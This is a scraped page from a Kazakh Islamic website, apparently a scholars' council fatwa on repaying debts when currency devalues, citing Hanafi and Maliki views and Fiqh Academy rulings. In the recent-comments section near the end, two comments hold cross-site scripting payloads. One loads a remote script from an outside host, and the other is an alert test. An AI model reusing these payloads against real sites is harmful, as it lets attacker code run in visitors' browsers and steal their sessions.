АҚША ҚҰНСЫЗДАНҒАНДА ҚАРЫЗ ҚАЛАЙ ҚАЙТАРЫЛАДЫ?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 17:49

ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

АҚША ҚҰНСЫЗДАНҒАНДА ҚАРЫЗ ҚАЛАЙ ҚАЙТАРЫЛАДЫ?

| A | +

Қарыз – екі тарап арасында мал-мүлікті үстемесіз қайтару шартымен жасалатын келісімшарт («Радду әл-мухтар», 5/161). Бүгінгі таңда қаржылық инфляцияға байланысты қарызды өтеу өзекті мәселелердің біріне айналды. Ғалымдар қарыз нысаны әртүрлі болуына қарай оның үкімін төмендегідей бөліп қарастырады. 

Біріншіден, егер қарыз алтын, күміс немесе өлшенетін нәрсе болса, құны өзгеруіне қарамастан ұқсасын қайтарады. Бұған барлық ғалымдар бірауыздан келіскен («Рәсаил имам ибн бидин»: 2/105. «Әл-муһаз заб»: 2/81, «Әл-муғни»: 4/244).

Екіншіден, егер валюта қолданыстан шыққан болса, онда қарызды басқа валютамен немесе алтын, күміспен алған күнінің құнымен қайтарады. «Муршиду әл-хайран» атты кітапта: «Егер қолданыстағы фулус (ал тын, күмістен тыс металдардан жасалған ұсақ ақшалар) немесе алтыны, күмісі аз металдан жасалған ақшалар қолданыстан шықса, қарызды алған күнгі құнымен қайтарады», – делінген («Муршиду әл-хайран әла мәзһаби имам Әби Ханифата ән-Нуғман»: 114-бет, 695 мәдда).

Үшіншіден, валютаның құнсыздануына байланысты қарызды қайтару. Бұған байланысты бірнеше көзқарас бар:

1. Көпшілік ғалымдардың көзқарасы бойынша, қарыз қай валютамен берілсе, оны арттырмай және кемітпей сол валютамен қайтару керек («Әл-маусуату әл-фиқһия»: 21/138, Ислам фиқһы академиясының қарарлары: №42 (4/5). Сондай-ақ қарызды беру барысында басқа валютамен қайтаруды шарт ету дұрыс емес. Ал қарызды қайтарып жатқанда басқа валютамен өтеуге келіссе, сол күнгі валюта құнымен өтеудің оқасы жоқ (Ислам фиқһы академиясының қарарлары: №75 (6/8).

2. Имам Әбу Юсуфтың пікірі бойынша, валюта құнсызданған жағдайда қарызды алған күнгі ақшаның құнымен қайтарады. Ханафи мәзһабында осы көзқарас негізге алынады («Радду әл-мухтар», 4/533-534. «әл-Бахру әр-райық», 6/219. «Рәсаил имам ибн бидин»: 2/95).

3. Мәлики мазһабының бір көзқарасында арадағы айырмашылық көп болса, ақшаның құны қайтарылады. Ал аз болса, алған ақшаның өзі қайтарылады («Хашияту Имам әр-Рәһуни»: 2/119). Фиқһ ғалымдары көп пен аздың шегін «үштен бірі» (сулус) деген өлшеммен есептеген. Имам Ахмад: «Ғалымдар үштен бірі деген мөлшерді он жеті мәселеде қолданған. Өйткені үштен бір көптікті, одан азы аздықты білдіреді», – деген («Әл-муғни»: 4/233, «Шарһу әл-Кәбир»: 4/261). Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) Сағд бин Әби Уаққасқа (Алла оған разы болсын): «Үштен бірін өсиет етейін бе?» дегенде, «Оның өзі көп», – деген (Бұхари: №3936).

Валюта құнсызданған жағдайда ақшаның құны үштен бірі немесе одан да көп болып, тараптардың арасында дау-дамай туындаса, екі тарап өзара бір бітімге келуі керек. Өйткені қарыздың өзін қайтарса, қарыз алушы, ал құнын қайтарса, қарыз беруші зиян шегіп қалады. Өзара бітімге келе алмаса, қазиға шағымданып, әділ шешімін алады. Хадисте: «Өзіңе де, өзгеге де зиян келтіруге болмайды», – делінген (Ибн Мәжә: №1909).

Ислам фиқһы академиясының №115 (12/9) қарарында: «Тараптар қаржылық инфляция күтіледі деген бол жаммен сақтық шарасы ретінде келісімшартта қарызды өтеу барысында алтын, күміс немесе құны едәуір өзгеріске ұшырамайтын ақша не заттың құнымен қайтаруға келіседі», – делінген (Ислам фиқһы академиясының қарарлары: №115 (9/12).

ҮКІМ:

1. Қарыз алтын, күміс немесе өлшенетін нәрсе болса, құны өзгеруіне қарамастан өзін қайтарады.

2. Қалыпты әрі ақша аз мөлшерде құнсызданған жағдайда қарыз қай валютамен берілсе, сол валютамен қайтарылады.

3. Қаржылық инфляция жағдайында қарызды беру және қайтару уақытындағы ақшаның құны үштен бірі немесе одан да көп болса, онда тараптар өзара бір бітімге келеді немесе қазиға жүгініп, шешімін алады.

4. Инфляция күтілетін жағдайда екі тарап қарызды (алтын, күміс, т.с.с.) бағасы қатты өзгермейтін заттың құнымен қайтаруға келіскен жөн.

ҚМДБ Ғұламалар кеңесі

ДЕРЕККӨЗІ muftyat.kz

ҚМДБ ресми сайты

Тегтер: қарыз беру
Предыдущий Следующий
САЛАУАТТЫЛЫҚ – ЖАН МЕН ТӘННІҢ ҮЙЛЕСІМІ ҚҰРАНШЫЛАР

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Сұрақ-жауап ҚАЖЫЛЫҚ ВИЗАСЫНСЫЗ ЖӘНЕ ЗАҢСЫЗ ЖОЛМЕН ҚАЖЫЛЫҚҚА БАРУҒА БОЛА МА?
Қажылық визасы – заманның талабына сай әрі көпшіліктің мүддесі мен қажеттіліктеріне орай Сауд Арабия Королдігінің қойған талабы және заңы.
Сұрақ-жауап ИНТЕРНЕТ ДҮКЕН АРҚЫЛЫ САУДА ЖАСАУҒА БОЛА МА?
Интернет дүкен – толық сипаттамасы бар тауарды сататын және сатып алатын веб сайт. Негізі тараптардың интернет немесе телефон секілді электрондық құрылғылар арқылы онлайн келісім жасауы бетпе-бет сауда жасағанмен тең. Ал пошта, факс, телеграф, т.б. жазу құрылғылары арқылы келісімшарт жасағанда хатты...
Сұрақ-жауап МЕДИТАЦИЯ ЖАСАУҒА БОЛА МА?
Медитация (meditatio) латын тілінен аударғанда «терең, ұзақ ойлау», «пікір қылу» деген мағынаны білдіреді. Медитация туралы сөз қозғалғанда көз алдымызға ең алдымен лотос позициясында отырған монахтар елестейді. Алайда оның көрінісіне қарамай тілдік мағынасымен қарар болсақ, жалпы пікір ету, зікір е...
Сұрақ-жауап ЛУДОМАНИЯНЫҢ ШАРИҒАТТАҒЫ ҮКІМІ ҚАНДАЙ?
Лудомания ойынқұмарлық деген мағынаны білдіреді. Лудомания (гемблинг, игромания) термині құмар ойынға тәуелділік деген мағына береді. Шариғатта кез келген ойынға құмар араласса харам, үлкен күнә саналады («Әл-маусуату әл-фиқһия»: 39/407)....
Сұрақ-жауап «ҚАРА КАССА» ОЙНАП ҰМРАҒА БАРУҒА БОЛА МА?
Қазіргі таңда ұмра сапарына барудың жаңа бір тәсілі пайда болды. Яғни, бірнеше адам «қара касса» ойнап, араларынан кезекпен бір адамды ай сайын ұмраға жіберіп отырады....
Сұрақ-жауап «ҚҰРAНШЫЛAР» ДЕГЕНІМІЗ КІМДЕР?
Бұл aғым eң aлғaш рeт жeкe бiрлecтiк рeтiндe «Әһлі-Құрaн» дeгeн aтпeн 1902 жылы Үндicтaнның Пeнджaб aудaнындaғы Лaхор қaлacындa пaйдa болғaн. Нeгiзiн caлушы – Aбдуллa Чaкрaлaуи (ө.ж. 1914). Ол «Әһлі-Құрaн», яғни «Құрaн иeлeрi» дeгeн тeрминiн aлғaш рeт қолдaнды. Чaкрaлaуи Мұхaммeд пaйғaмбaрдың (оғaн ...
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 17:49

Бамдатқа дейін 04:37

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
12 сағат. бұрын

О милостыне

"/1

X X
12 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi